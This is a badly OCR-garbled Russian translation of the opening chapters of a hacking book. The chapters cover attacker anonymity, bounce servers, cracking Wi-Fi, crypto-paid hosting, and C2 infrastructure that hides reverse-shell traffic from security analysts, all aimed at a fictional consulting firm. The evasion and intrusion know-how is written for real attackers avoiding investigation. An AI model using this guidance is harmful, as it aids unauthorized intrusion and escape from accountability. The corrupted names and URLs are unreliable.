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Список опечаток 
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высокое качество наших текстов, ошибки все равно случаются. Если 
вы найдете ошибку в одной из наших книг, мы будем очень благодар- 
ны, если вы сообщите о ней главному редактору по адресу атКргез$ @ 
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Нарушение авторских прав 
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Об авторе 


Спарк Флоу (Ѕрагс Е1Іом) – эксперт по компьютерной безопасности, 
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2018). Мэтт получил степень бакалавра в области сетей, безопасности 
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' На русском языке эти книги официально не издавались и распространяют- 


ся в самодеятельных переводах под разными названиями. — Прим. перев. 
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щим людям: 


Прежде всего Лиз Чедвик за ее острые навыки и безупречные 
корректировки, которые помогли передать неясные, а иногда 
и запутанные мысли на этих страницах. 

Мэтту Берроу за усердную и квалифицированную проверку 
кода, командных строк и всего остального. 

Всем сотрудникам № Ѕїагсһ Ргез$, которые работали над этой 
книгой, от дизайна до редактирования, включая Катрину Тей- 
лор и Барта Рида. И конечно же, Биллу и Барбаре за ту первую 
встречу, с которой началось это приключение. 

Моей жене за то, что она постоянно вдохновляла меня во 
многих отношениях, но больше всего за то, что поддерживала 
во мне писательскую лихорадку, а также за то, что она стойко 
терпела одиночество, пока я с головой погрузился в эту книгу. 

Моему брату и сестре за разговоры, которые разжигают мой 
аппетит к учебе. Спустя восемь месяцев после одного из таких 
разговоров я написал свою первую книгу о хакинге. 


Наконец, я хотел бы выразить свою благодарность, любовь и вос- 
хищение моим родителям за то, что они научили меня всегда быть 
любознательным и стремиться к лучшему. 


ВВЕДЕНИЕ 


Индустрия безопасности сложна. Я поддерживаю отно- 
шения любви/ненависти с этой неоднозначной отраслью 
в немалой степени из-за ее непостоянной и мимолетной 
природы. Вы можете потратить месяцы или годы, отта- 
чивая свои навыки в определенной области безопасно- 
сти – скажем, в повышении привилегий и расширении охвата 
с помощью Ромтег$ Ве! - только для того, чтобы почувствовать себя 
совершенно бесполезным, оказавшись в среде пих или тасО$. 

Ктому времени, когда вы научитесь подбирать ключи к дверям та- 
сОЅ и побеждать привратника Шпих, новая сборка Міпӣомѕ 10 выйдет 
с новыми мерами обнаружения, что сделает любую привычную атаку 
через РомегЅће] абсолютно бесполезной. Вы возвращаетесь к тому, 
с чего начинали: охотитесь за блогами, посещаете конференции и по- 
гружаетесь в исследование документации и кода, чтобы обновить 
свои инструменты и разработать новые методы взлома. 

Если подумать трезво, эти тараканьи бега могут показаться пол- 
ным безумием. Вы, конечно, всегда можете утешить свое эго, вторга- 
ясь в сети компаний из списка Еогеипе 500, которые считают Міпӣомѕ 
ХР/2003 драгоценным вымирающим видом, который нужно сохра- 
нить любой ценой, но волна забвения настигает вас. В глубине души 
вы знаете, что вам придется постоянно догонять уходящий поезд. 

В конце концов, это и есть хакерство. Разочарование от потери лю- 
бимого трюка может сравниться только с восторгом от освоения но- 
вой блестящей технологии. 

Я в общих чертах определяю хакерство (или взлом) как совокуп- 
ность приемов и инструкций, предназначенных для достижения не- 
стандартных результатов в системе или процессе. Тем не менее срок 
годности этих уловок истекает все быстрее. Ваша цель как специалис- 
та по безопасности или энтузиаста - найти и употребить как можно 
больше полезных трюков, пока они не протухли. 

Никогда не знаешь, какое копье остановит бегущего на тебя быка. 

В других своих книгах я много внимания уделял атакам, связанным 
с Міпаомѕ, потому что большинство компаний из списка Еогіипе 500 
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построили большую часть своей среды на основе АсНуе П!тесготу. Это 
было идеальное решение для управления тысячами пользователей, 
серверов и приложений. 

Однако времена меняются. Компания, создающая свою инфра- 
структуру с нуля, больше не будет запускать контроллер домена МИ п- 
аомѕ на «голом железе» в общем центре обработки данных на окраине 
города. В самом деле, покажите мне системного администратора, ко- 
торый все еще хочет управлять устаревшим оборудованием и клас- 
тером ЕЗХ! из трех десятков машин с различными брандмауэрами, 
коммутаторами, маршрутизаторами и балансировщиками нагрузки. 
Не мешайте ему засунуть голову в петлю и закройте дверь! 

Зачем так напрягаться, если вы можете настроить все необходимое 
в облачной среде за считанные секунды? Базы данных, контейне- 
ры роскКег и Асїјуе Рігесїогу находятся на расстоянии одного клика 
мыши, а бесплатная пробная версия порадует вашего бухгалтера. Ко- 
нечно, первоначальная низкая плата быстро увеличивается по мере 
роста масштаба ваших серверов, но большинство стартапов будут 
только рады таким проблемам. Это означает, что бизнес растет. 

В этой книге я решил не рассматривать традиционную архитекту- 
ру, применяемую в старых жирных компаниях. Давайте посмотрим, 
как злоумышленник может победить современного и достойного 
противника: компанию, которая пустила свои корни в динамичной 
и отказоустойчивой облачной среде и поддерживает свой рост с по- 
мощью методов реуОрз. 

Это не просто модные словечки, которые обожают употреблять 
невежественные боссы компаний и хищные рекрутеры из кадровых 
агентств. Это потрясающие новые парадигмы, и когда им следуют 
успешно, они настолько глубоко меняют архитектуру и принципы ра- 
боты сетей и приложений, что приходится напрягать все свое чутье 
и собирать знания по крупицам, чтобы искать и находить лазейки. 
Уязвимости, на которые можно было не обращать внимания в клас- 
сической среде, внезапно приобретают смертельный потенциал в об- 
лачной инфраструктуре. Забудьте о 501-инъекциях. Как только вы 
узнаете, что машина размещена в Ататоп Мер Ѕегуісеѕ (АМ), вам 
следует полностью сосредоточиться на другом классе уязвимостей. 

Злоумышленники перескакивали с одной машины на другую, обхо- 
дя правила брандмауэра и прокладывая себе путь к внутренней базе 
данных, АсНуе Гігесїогу и тому подобному. Это путешествие часто 
включало сканирование сети, туннелирование трафика и так далее. 
В облачной среде вы можете управлять основными элементами инф- 
раструктуры с любого ІР-адреса в мире. Вы обнаружили, что бранд- 
мауэр блокирует доступ к определенной машине? Раздобыв подходя- 
щие учетные данные, вы можете отменить это конкретное правило 
одним вызовом АРІ из Китая и получить доступ к этому «внутренне- 
му» компьютеру с Филиппин. 

Конечно, это не значит, что больше не нужно взламывать пароли 
и перескакивать с машины на машину. Нам по-прежнему не обойтись 
без сетевой магии, чтобы получить доступ к драгоценной конечной 
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точке, содержащей бизнес-данные, но цель сместилась от контроля 
над отдельными машинами к контролю над самой инфраструктурой. 

Рассмотрим реуОрѕ – еще один ключевой набор принципов, отста- 
иваемых технологическими компаниями. В общих чертах он опреде- 
ляется как комплекс технических или организационных мер, направ- 
ленных на автоматизацию разработки программного обеспечения 
и повышение производительности и надежности кода. реуОрѕ охва- 
тывает все: от определения инфраструктуры как кода до контейне- 
ризации и автоматизированного мониторинга. Одним из основных 
следствий внедрения культуры ОеуОрз является то, что компании все 
меньше и меньше боятся изменять свою инфраструктуру и приложе- 
ния. Забудьте типичную ИТ-мантру: «Работает - не трогай». Когда вы 
развертываете приложение в рабочей среде пять раз в неделю, вам 
удобнее изменять его так, как вы считаете нужным. 

Когда вы перестаете жестко привязывать приложение к системе, 
в которой оно работает, у вас появляется больше возможностей для 
обновления инфраструктуры. Когда у вас есть сквозные интеграцион- 
ные тесты, вы можете легко позволить себе исправлять критические 
части кода с минимальными побочными эффектами. Когда у вас есть 
инфраструктура, определяемая как код, вы можете исключить «серые 
зоны» и строго контролировать каждую машину в инфраструктуре - 
роскошь, за которую многие крупные компании готовы пойти на пре- 
ступление. 

Эта новая волна методик ОеуОрз исключает многие допущения, на 
которые мы исторически полагались при поиске дыр в корпоратив- 
ной сети. Хакеры привыкли проникать в сознание человека, проекти- 
рующего систему, чтобы воспользоваться его ложными предпосылка- 
ми и поспешными решениями. Но как это сделает хакер, застрявший 
в старых способах проектирования и эксплуатации систем? 

Конечно, новая эра облачных вычислений - это отнюдь не волшеб- 
ный мир единорогов, писающих радугой. 

Грандиозные ошибки, совершенные в 1970-х годах, до сих пор доб- 
росовестно - если не сказать фанатично - повторяются в этом деся- 
тилетии. Разве не возмутительно, что в сегодняшнем неспокойном 
мире безопасность по-прежнему считается «предпочтительной», 
а не основной функцией первоначального минимально жизнеспособ- 
ного продукта (тіпітит мае ргодисё, МУР)? Я говорю не про ТоТ- 
стартапы, которым остался один раунд финансирования до банкрот- 
ства, а о крупных инфраструктурных продуктах, таких как КиБегпе{ез, 
Сһеғ, Ѕрагк и так далее. Людей, позволяющих себе подобные выска- 
зывания, нужно медленно и больно бить по лбу стальной ложкой до 
потери сознания: 


«Безопасность в Ѕрагк по умолчанию отключена. Это может 
означать, что с настройками по умолчанию вы уязвимы для 
атак». 


Но я отвлекся. Я хочу сказать, что ОеуОрз и переход в облака при- 
несли с собой потрясающие изменения, но вдумчивому хакеру доста- 
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точно небольших намеков и корректировок, чтобы успешно двигаться 
по новому пути. Это было волнующее прозрение, которое вдохновило 
меня написать эту книгу. 


О чем расскажет эта книга 


Это не типичная техническая книга и не учебник в его традиционном 
понимании. Мы с вами примеряем на себя роль хакера, и наша цель – 
вымышленная политическая консалтинговая фирма Сгеѓѕсһ РоПсо. 
Я проведу вас через день (или несколько) из жизни хакера, по всему 
пути от начала до конца - от создания качественной анонимной инф- 
раструктуры до проведения предварительной разведки и, наконец, 
проникновения в систему и захвата контроля над целью. Компании 
и названия, используемые здесь, в основном вымышлены, за исклю- 
чением очевидных брендов типа Киђегпеѓеѕ или АМ5. Вы должны 
понимать, что хотя вы можете адаптировать и опробовать многое 
(и я призываю вас это сделать), вы не сможете буквально следовать 
каждому шагу, как показано в книге. Например, в конечном итоге 
мы взломаем электронную почту генерального директора компании 
Стеѓѕсһ РоНЧсо Александры Стикс. Разумеется, в реальной жизни ни 
компания, ни директор не существуют. 

Продвигаясь на ощупь в инфраструктуре компании, мы столкнемся 
со многими тупиками и препятствиями, но я покажу вам, как можно 
использовать самые скромные зацепки, чтобы скорректировать свой 
путь. Так происходит взлом в реальном мире. Не каждый маршрут 
приведет к успеху, но при достаточной настойчивости, капельке твор- 
чества и чистой удаче можно наткнуться на интересные находки. Для 
большей достоверности примеров дальше я буду говорить о наших 
вымышленных целях так, будто они столь же реальны, как вы или я. 

Несколько слов о цели нашего взлома. Сте{зсв РоНсо Сопѕиіїііпе – 
это фирма, которая помогает политикам проводить свои предвыбор- 
ные кампании. Сте{зсп РоНЯсо (которую я также буду называть СР) 
утверждает, что имеет миллионы точек данных и сложные профили 
моделирования для эффективного взаимодействия с ключевой ауди- 
торией. Как они красиво написали на своем веб-сайте: «Результат 
выборов часто зависит от последних критически настроенных изби- 
рателей. Наши услуги по управлению данными и микротаргетингу 
помогут вам обратиться к нужным людям в нужное время». 

Истинный смысл этой фразы такой: «У нас есть огромная база дан- 
ных симпатий и антипатий миллионов людей, и мы можем целена- 
правленно загрузить им в голову любой контент, полезный для вашей 
политической программы». 

Так гораздо понятнее, но гораздо страшнее, верно? 

Хотел бы я, чтобы и это было вымыслом, но, к сожалению, имен- 
но так в наши дни проходят почти все «демократические выборы», 
так что описанный в этой книге вымышленный пример очень близок 
к реальной жизни. 
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Краткое содержание книги 


Я не хочу заранее раскрывать интригу, поэтому скажу лишь, что книга 
разбита на четыре части. Часть І, «Поймай меня, если сможешь», рас- 
сказывает о построении надежной хакерской инфраструктуры, гаран- 
тирующей анонимность в интернете. Мы создадим арсенал пользова- 
тельских скриптов, контейнеров и серверов управления и контроля 
(С2) и настроим внутреннюю атакующую инфраструктуру на макси- 
мально эффективную работу в автоматическом режиме. 

С оружием наперевес мы переходим к части П, «За работу», где речь 
идет о базовой разведке, которую вам нужно выполнить, чтобы лучше 
узнать свою цель и отыскать начальные уязвимости. 

В части Ш, «Полное погружение», мы получаем доступ к сетевой 
среде, которая поначалу кажется бесплодной. Мы переходим в ней от 
одного приложения к другому и от одной учетной записи к другой, 
пока не достигнем полного контроля над целевой инфраструктурой. 

Наконец, в части ІУ «Враг внутри» мы собираем все достижения 
в один атакующий кулак и пожинаем плоды, кропотливо прочесывая 
терабайты данных и используя скрытые связи между нашими целями. 

Я не стал подробно разбирать каждый возможный вектор атаки 
или потенциально полезный инструмент, иначе книга никогда бы не 
закончилась. Вместо этого в конце каждой главы я даю вам список 
дополнительных материалов, с которыми вы можете ознакомиться 
на досуге. 


ЧАСТЬ | 


ПОЙМАЙ МЕНЯ, 
ЕСЛИ СМОЖЕШЬ 


...Конечно, у нас есть свобода воли, 
потому что у нас нет другого выбора, кроме как иметь ее. 


Кристофер Хитченс 


СТАНЬТЕ АНОНИМНЫМ 
В СЕТИ 


Пентестеры и члены красных команд любят устанавли- 

вать и настраивать свою инфраструктуру так же сильно, 

как и писать отчеты о вторжении, - то есть совсем никак. 

Они испытывают эстетическое удовольствие от развер- 
тывания эксплойтов на компьютере жертвы, горизонталь- 
ного перемещения по сети и повышения привилегий. Созда- 
ние безопасной инфраструктуры - скучная работа. Если пентестер 
случайно «засветит» свой ІР-адрес в логах доступа к серверу своей 
жертвы, что с того? Он вечером угостит команду пивом за то, что на- 
портачил, синюю команду начальство похлопает по плечу за то, что 
она обнаружила и разоблачила нападение, а на следующий день каж- 
дый сможет начать все заново. 


Краткий словарь терминов на случай, если вы нови- 
чок в мире информационной безопасности: пентестеры исчерпывающе 
оценивают безопасность приложения, сети или системы, имитируя 
определенные действия злоумышленника. Красная команда оценивает 
уровень системы безопасности компании, имитируя реальные атаки 
хакеров (желательно без предварительных знаний о системе). Синяя 
команда защищает компанию и противостоит красным командам. 


Станьте анонимным в сети 19 


В реальном мире все по-другому. Например, для хакеров нет ни- 
каких послаблений. У них нет такой роскоши, как юридически обя- 
зывающий договор о тестировании на проникновение. Их свобода, 
а иногда и жизнь зависит от безопасности инструментов и аноним- 
ности инфраструктуры. Вот почему в каждой из своих книг я стара- 
юсь написать об основных процедурах операционной безопасности 
(ОрЅес) ио том, как построить анонимную и эффективную хакерскую 
инфраструктуру: краткое руководство, как оставаться в безопасности 
в этом все более жестком и авторитарном мире, в котором мы жи- 
вем. Я начну эту книгу с рассказа о том, как стать максимально ано- 
нимным в сети, используя виртуальную частную сеть (уігїџа1 ргіуаїе 
пеїмогКк, УР№), Тог, опорные серверы и заменяемую и переносимую 
инфраструктуру атаки. 

Если вы уже знакомы стекущим фреймворком управления и контро- 
ля (соттапа апа сопто|, С2), контейнерами и инструментами авто- 
матизации, такими как Теггаёіогт, вы можете сразу перейти к главе 4, 
где начинается разговор о настоящем взломе. 


УРМ и его недостатки 


Я надеюсь, что сегодня почти все знают, что раскрывать свой домаш- 
ний или рабочий ІР-адрес целевому веб-сайту, который вы атакуе- 
те, – это большая глупость. Тем не менее большинство людей всерьез 
полагают, что вполне достаточно посещать веб-сайты через УРМ- 
сервис, который обещает полную анонимность, – сервис, на котором 
они зарегистрировались со своего домашнего ІР-адреса, возможно, 
даже с оплатой собственной кредитной карты, вместе со своим име- 
нем и адресом. Что еще хуже, они установили это УРМ-соединение 
со своего домашнего ноутбука во время потоковой передачи своего 
любимого шоу Ме Их и общения с друзьями на Еасероок. 

Давайте внесем ясность прямо сейчас. Независимо от того, что они 
говорят, УРМ-сервисы всегда, всегда будут вести логи в той или иной 
форме: ІР-адрес, О№5-запросы, активные сеансы и так далее. Давай- 
те на секунду прикинемся наивным лузером и представим, что нет 
законов, обязывающих каждого провайдера виртуального доступа 
вести логи метаданных исходящих соединений, - такие законы дей- 
ствуют в большинстве стран, и ни один УР№-провайдер не станет их 
нарушать ради вашей жалкой ежемесячной подписки, - но давайте 
на минутку представим, что этих законов нет. Поставщик УРМ имеет 
сотни, если не тысячи серверов в нескольких центрах обработки дан- 
ных по всему миру. У них также есть тысячи пользователей - одни на 
машинах с Шпих, другие на Міпӣоуѕ и даже несколько испорченных 
пользователей на Мас. Вы действительно можете поверить, что мож- 
но управлять столь огромной и разнородной инфраструктурой без 
таких элементарных вещей, как логи? 
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ШУМА 138 Метаданные относятся к описанию сеанса связи - 
какой [Р-адрес связывался с каким [Р-адресом, с использованием какого 
протокола, в какое время и т. д., – но не к ее содержанию. 


Без логов техподдержка была бы такой же бесполезной и неве- 
жественной, как и растерянный клиент, звонящий им для решения 
проблемы. Никто в компании не знал бы, как начать решать прос- 
тую проблему поиска Ю№5, не говоря уже о загадочных проблемах 
маршрутизации, связанных с потерей пакетов, предпочтительными 
маршрутами и прочим сетевым шаманством. Многие провайдеры 
УРМ считают необходимым громогласно защищать свой «сервис без 
логов», чтобы не отставать от конкурентов, делающих аналогичные 
заявления, но это бессмысленная гонка, основанная на вопиющей 
лжи или «маркетинге», как это нынче принято называть. 

Лучшее, на что вы можете надеяться в отношении провайдера 
УРМ, - это то, что он не продает данные клиентов любому, кто пред- 
ложит достаточно высокую цену. И даже не связывайтесь с бесплат- 
ными провайдерами. Инвестируйте в свою конфиденциальность как 
время, так и деньги. Я рекомендую начать с АПУРМ и РготопУРМ, ко- 
торые являются серьезными игроками в бизнесе. 

Такое же представление об анонимности применимо к Тог (Те 
Опіоп Вощег, йіірѕ;//миму.ѓогргојесіогд), который обещает анонимную 
работу в интернете через сеть узлов и ретрансляторов, скрывающих 
ваш ІР-адрес. Назовите мне хоть одну причину, по которой вы долж- 
ны слепо доверять первому узлу, с которым вы связываетесь, для вхо- 
да в сеть Тог. Почему вы должны доверять ему больше, чем нигерий- 
скому принцу, который обещает поделиться наследством в обмен на 
номер вашей кредитной карты? Конечно, первый узел знает только 
ваш ІР-адрес, но, как правило, даже этого предостаточно. 


Физическое местоположение 


Один из способов повысить свою анонимность - следить за своим 
физическим местоположением при взломе. Не поймите меня непра- 
вильно: Тог по-своему великолепен. УРМ - отличная альтернатива. Но 
когда вы полагаетесь на эти службы, всегда предполагайте, что ваш 
ЇР-адрес - и, следовательно, ваше географическое положение и/или 
отпечаток браузера - известен этим посредникам и может быть об- 
наружен вашей конечной целью или любым лицом, проводящим рас- 
следование от их имени. Как только вы принимаете эту предпосылку, 
естественным образом напрашивается вывод: чтобы быть по-настоя- 
щему анонимным в интернете, вам нужно уделять своему физиче- 
скому следу ничуть не меньше внимания, чем вы уделяете цифровым 
следам в интернете. 

Если вам посчастливилось жить в большом городе, используйте 
оживленные вокзалы, торговые центры или подобные обществен- 
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ные места, где есть общедоступный Мі-Еі, чтобы спокойно проводить 
свои операции. Станьте еще одной молекулой в ежедневном потоке 
пассажиров. Однако будьте осторожны, чтобы не стать жертвой на- 
шей коварной человеческой природы, склонной к шаблонному пове- 
дению. Старайтесь не сидеть на одном и том же месте изо дня в день. 
Возьмите за правило посещать новые места и даже время от времени 
менять города. 

В некоторых странах, таких как Китай, Япония, Великобритания, 
Сингапур и США, установлено большое количество камер, наблюдаю- 
щих за улицами и общественными местами. В этом случае альтерна- 
тивой было бы использование одного из старейших приемов: блужда- 
ющий доступ в сеть. Используйте автомобиль, чтобы покататься по 
городу в поисках открытых точек доступа Мі-Еі. Типичный приемник 
МЛ-Е! может ловить сигнал на расстоянии до 40 метров, которое вы 
можете увеличить до пары сотен метров с помощью направленной 
антенны. 

Как только вы найдете открытую или плохо защищенную точку 
доступа, которую вы можете взломать – шифрование МЕР и слабые 
пароли МРА2 не редкость и могут быть взломаны с помощью таких 
инструментов, как Аігсгаск-пе и Назбсаф, - припаркуйте поблизости 
свой автомобиль и приступайте к работе. Если вы не любите бесцель- 
но колесить по городу, посмотрите онлайн-проекты, такие как М/іЕ1 
Мар на №&р5./Имииимийтар.го, в которых перечислены открытые точки 
доступа \Л-Е1, иногда с их паролями. Быть хакером - это на самом 
деле образ жизни. Если вы действительно привержены своему делу, 
вы должны полностью принять его и избегать небрежности любой 
ценой. 


Рабочий ноутбук 


Теперь, когда мы позаботились о местоположении, давайте разберем- 
ся с ноутбуком. Люди очень дорожат своими ноутбуками с логотипа- 
ми брендов, сумасшедшими техническими характеристиками и, черт 
возьми, со списком закладок, которые все клянутся, что когда-нибудь 
просмотрят. Такой компьютер хорош на местной конференции ком- 
пьютерных гиков, а не для взлома. Любой компьютер, который вы 
используете для болтовни в соцсетях и проверки почтового ящика 
Стаі, практически наверняка известен большинству государствен- 
ных учреждений. Никакой навороченный УРМ не спасет ваше милое 
лицо, если цифровой отпечаток вашего браузера каким-то образом 
станет известен службе безопасности крутой конторы, которую вы 
атакуете. 

Для целей взлома нам нужна эфемерная операционная система 
(ОС), которая сбрасывает все логи при каждой перезагрузке. Мы хра- 
ним эту ОС на ОЅВ-накопителе, и всякий раз, оказавшись в удобном 
месте, подключаем накопитель к компьютеру, чтобы загрузить нашу 
рабочую среду. 
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Таії5 (ИНр$У/Ла|5.Боит.ога/) – это специальный дистрибутив Мпих 
для такого типа деятельности. Он автоматически меняет МАС-адрес, 
заставляет все соединения проходить через Тог и избегает хранения 
данных на жестком диске ноутбука. (Наоборот, традиционные опе- 
рационные системы, как правило, хранят часть памяти на диске для 
оптимизации параллельного выполнения - операции, известной как 
подкачка.) Если дистрибутив ТаЙ$ был достаточно хорош для Сноуде- 
на, то, держу пари, он устроит почти всех. Я рекомендую настроить ОС 
ТаПз$ и сохранить ее на внешнем диске, прежде чем делать что-либо 
еще. 

Некоторые люди испытывают необъяснимую любовь к Сһготе- 
Боок. Это недорогое оборудование, на котором установлена мини- 
мальная операционная система, поддерживающая только браузер 
итерминал. Выглядит идеально, правда? Ничего подобного. Это даже 
хуже, чем лизать железный столб зимой. Мы говорим об ОС, разра- 
ботанной Соое, которая требует, чтобы вы вошли в свою учетную 
запись Соое, синхронизировали свои данные и сохранили их на 
Соое Диске. Нужно ли мне продолжать? Да, существуют расшире- 
ния Сһготіит 0$, которые отключают часть синхронизации Соо?]е, 
например М№ауиО$, но правда заключается в том, что ни устройства 
Соов1е, ни расширения не были разработаны специально для сохра- 
нения конфиденциальности, и ни при каких обстоятельствах они не 
должны использоваться для анонимных хакерских действий. Должно 
быть, в Соое изрядно повеселились по этому поводу. 

Ваш рабочий ноутбук должен содержать только временные рабо- 
чие данные, такие как вкладки браузера, набор команд для быстрого 
копирования/вставки и т. д. Если вам абсолютно необходимо экспор- 
тировать огромные объемы данных, обязательно храните эти данные 
в зашифрованном виде на портативном накопителе. 


Опорные серверы 


Единственное назначение нашего ноутбука – подключить нас к набо- 
ру опорных, или прыгающих, серверов (боипсіпе ѕегуег), которые содер- 
жат необходимые инструменты и сценарии для подготовки к наше- 
му приключению. Это виртуальные хосты, которые мы настраиваем 
анонимно, подключаемся к ним только через Тог или УРМ, доверяем 
взаимодействие с нашими более вредоносными виртуальными ма- 
шинами (уігїџа] тасһіпе, УМ) и храним нашу добычу. 

Эти серверы предоставляют нам надежный и стабильный шлюз 
для нашей будущей атакующей инфраструктуры. Мы будем подклю- 
чаться к опорному серверу по $5Н непосредственно после того, как 
удостоверимся, что установили соединение через УРМ или Тог. Мы 
можем инициировать соединение Ѕесиге 5Вей (55Н) через случайную 
точку доступа на холодном и оживленном вокзале и оказаться в теп- 
лой и уютной обстановке, где нас ждут все наши инструменты и лю- 
бимые псевдонимы 751. 
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Опорные серверы могут быть размещены у одного или несколь- 
ких облачных провайдеров, разбросанных по разным географиче- 
ским точкам. Очевидным ограничением является платежное реше- 
ние, поддерживаемое этими провайдерами. Вот несколько примеров 
облачных провайдеров с достойными ценами, которые принимают 
криптовалюты: 


• КашМоде (И#рз./Лмимигатподе.сот/) стоит около 5 долларов США 
в месяц за сервер с 1 ГБ памяти и двумя ядрами виртуального ЦП 
(УСРО). Принимает только биткойн; 


• М№ісеҮР5 (Ліірѕ://пісеүрѕ.пеї/) стоит около 14,99 евро в месяц за сер- 
вер с 1 ГБ памяти и одним ядром виртуального ЦП. Принимает 
Мопего и 7саѕ|; 


• СшЁ (ћрѕ;/Лууу.сіпји.сот/) стоит около 4,79 доллара в месяц за 
сервер с 2 ГБ памяти и одним ядром виртуального ЦП. Принима- 
ет Мопего и 7са$В; 


• РіҮР5 (л105;//ріурѕ.сот/) обойдется около 14,97 доллара в месяц за 
сервер с 1 ГБ памяти и одним ядром виртуального ЦП. Принима- 
ет Мопего и 7са$Б; 


® Зесиге)гавоп (№&р5./бесигеагадоп.пе!) стоит около 4,99 доллара 
в месяц за сервер с 1 ГБ памяти и двумя ядрами виртуальных 
ЦП. Принимает только биткойн. 


Некоторые сервисы, такие как ВИГаипсВ (^1р5;//0і#аипсһ.іо/), могут 
выступать в роли простого посредника. ВИГаипсй принимает пла- 
тежи в биткойнах, но затем создает серверы в РіеіќѓаІОсеап и Мподе, 
используя свою собственную учетную запись (конечно, в три раза до- 
роже, что просто возмутительно). Еще один посреднический сервис 
с чуть более выгодной стоимостью - это Біїћоѕі (А1р5;/іћоѕ. і0/), ко- 
торый по-прежнему берет комиссию 50 %. Их недостаток, помимо от- 
кровенно мошеннических расценок, заключается в том, что ни один 
из этих провайдеров не предоставляет вам доступ к АРІ О1еКа!Осеап, 
который помогает автоматизировать большую часть настройки. 

Выбор облачного провайдера приводит нас к горькому компромис- 
су: поддержка криптовалют и псевдоанонимность против простоты 
использования и автоматизации. 

Все основные облачные провайдеры - АМ, Соое СІоџа, М1сгозой 
Атиге, АіБађа и т. д. - требуют пройти проверку валидности вашей 
кредитной карты перед подтверждением учетной записи. В зависи- 
мости от того, где вы живете, это может не доставить никаких проб- 
лем, так как существует множество сервисов, которые предоставляют 
предоплаченные кредитные карты в обмен на наличные. Некоторые 
онлайн-сервисы даже принимают кредитные карты для пополнения 
с помощью биткойнов, но для большинства из них потребуется удо- 
стоверение личности государственного образца. Это риск, который 
вы должны тщательно изучить. 

В идеале опорные серверы должны использоваться для размеще- 
ния инструментов, таких как Теггаѓогт, роскег и АпѕіЫе, которые поз- 
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же помогут нам создать несколько инфраструктур для атак. Общий 
обзор хакерской архитектуры представлен на рис. 1.1. 
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Рис. 1.1. Наиболее общий обзор хакерской инфраструктуры 


Наши опорные серверы никогда не будут взаимодействовать 
с целью. Ни единого звука. Поэтому мы можем позволить себе поль- 
зоваться ими немного дольше перед сменой - несколько недель или 
месяцев – без значительных рисков. Тем не менее опытные службы 
безопасности могут найти способ связать эти серверы с теми, которые 
используются для прямого взаимодействия с целью, поэтому я реко- 
мендую регулярно удалять и повторно создавать такие серверы. 


Инфраструктура атаки 


Наша инфраструктура атаки имеет гораздо более высокий уровень 
волатильности, чем наши отказоустойчивые серверы, и ее следует 
хранить всего несколько дней. Если возможно, она должна быть уни- 
кальной для каждой операции или цели. Последнее, что нам нужно, – 
это чтобы безопасники собрали воедино различные улики от разных 
целей, пораженных с одного и того же ТР. 

Инфраструктура атаки обычно состоит из интерфейсной и сервер- 
ной систем. Интерфейсная система может инициировать соединения 
с целью, сканировать машины и т. д. Ее также можно использовать – 
в случае оболочки с обратным подключением - для маршрутизации 
входящих пакетов через веб-прокси и доставки их, при необходимо- 
сти, в серверную систему (обычно это среда С2, такая как Меїаѕріоії 
или Етріге). Только некоторые запросы перенаправляются на сервер- 
ную часть С2; большинство страниц возвращают заурядное содержи- 
мое, как показано на рис. 1.2. 


/іпаех 


Поддельная страница 


/ѕесгеіРаде 


Рис. 1.2. Маршрутизация пакетов к серверной части 
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Эта маршрутизация пакетов может быть выполнена с помощью 
обычного веб-прокси, такого как №еіпх или АрасПе, который действу- 
ет как фильтр: запросы обратной оболочки от зараженных компьюте- 
ров направляются непосредственно на соответствующий серверный 
экземпляр С2, в то время как в ответ на остальные запросы - напри- 
мер, от аналитиков безопасности - отображается невинная веб-стра- 
ница. Базовая среда С2 на самом деле является позвоночником инф- 
раструктуры атаки, выполняя команды на зараженных машинах, 
извлекая файлы, доставляя эксплойты и делая многое другое. 

Вам нужно, чтобы ваша инфраструктура была модульной и заме- 
няемой по желанию. Обход запрета доступа с некоторых ІР-адресов 
должен бытьтаким же простым, как отправка одной команды для соз- 
дания нового прокси. Проблемы с серверной частью С2? Введите одну 
команду, и у вас будет новый сервер С2, работающий с точно такой же 
конфигурацией. 

Достижение такого уровня автоматизации не является причуд- 
ливым способом опробовать самые модные инструменты и методы 
программирования. Чем проще запустить полностью настроенные 
атакующие серверы, тем меньше ошибок мы совершаем, особенно 
в стрессовых ситуациях. Это хороший повод примерить на себя шкуру 
РеуОрз-специалиста, изучить его ремесло и подстроить его под свои 
нужды. Надеюсь, это подскажет нам некоторые недостатки атакуе- 
мых систем, которыми мы позже воспользуемся в нашем хакерском 
приключении. Следующая глава будет посвящена построению сер- 
верной инфраструктуры. 


Дополнительные ресурсы 


® Удивительный рассказ о жизни и приключениях Эдварда Сноуде- 
на в разведывательном сообществе можно найти в книге «Личное 
дело» Эдварда Сноудена (Эксмо, 2019). 

• Учебник ЧаткАидах по взлому зашифрованных МЕР-сообщений 
можно найти здесь: ћіірѕ;/аігсгаск-пд.огд/. 

® Руководство Брэннона Дорси по взлому Мі-Еі-маршрутизаторов 
М/РА/МГРА2 с помощью Аігсгаск-пе и Наѕћсаї по адресу РНрз.//пакК!п9. 
огд/. 

• Руководство Мухаммада Арула по настройке 75һ на компьютере 
с Ипих на странице Аѓірѕ/Лууу.һоуѓојогде.сот/. 


СЕРВЕР УПРАВЛЕНИЯ 
И КОНТРОЛЯ (С2) 


Давайте построим атакующую инфраструктуру, начав 
с основного инструментария любого злоумышленника: 
сервера С2. Мы рассмотрим три фреймворка и протести- 
руем каждый на виртуальной машине, которую будем 
использовать в качестве цели. Во-первых, мы кратко рас- 
смотрим историю С2, чтобы лучше понимать то, что имеем 


сегодня. 


Родословная С2 


На протяжении большей части последнего десятилетия непобеди- 
мым чемпионом среди фреймворков С2 - тем, который предлагал са- 
мый широкий и разнообразный набор эксплойтов, стейджеров и об- 
ратных оболочек, – был печально известный фреймворк Меазрюой 
(һіїрѕ Лим теа$р!ой.сот/). Попробуйте поискать учебник по пентесту 
или взлому, и я уверен, что первая же ссылка приведет вас к статье, 
описывающей, как настроить теегрге{ег – так называется пользова- 
тельская полезная нагрузка, используемая Меѓаѕріойї для достижения 
полного контроля над машиной Гтих. Конечно, в статье забывают 
упомянуть, что настройки Меказр]о по умолчанию моментально об- 
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наруживаются всеми средствами безопасности с 2007 г., но не будем 
слишком циничными. 

Меѓаѕріоіг, безусловно, является моим любимым инструментом, 
когда нужно взять под свой контроль беззащитную Шіпих-систему, 
не оснащенную назойливыми антивирусами. Соединение очень ста- 
бильное, фреймворк имеет множество модулей, и, вопреки тому, что 
говорится во многих импровизированных учебниках, вы можете - 
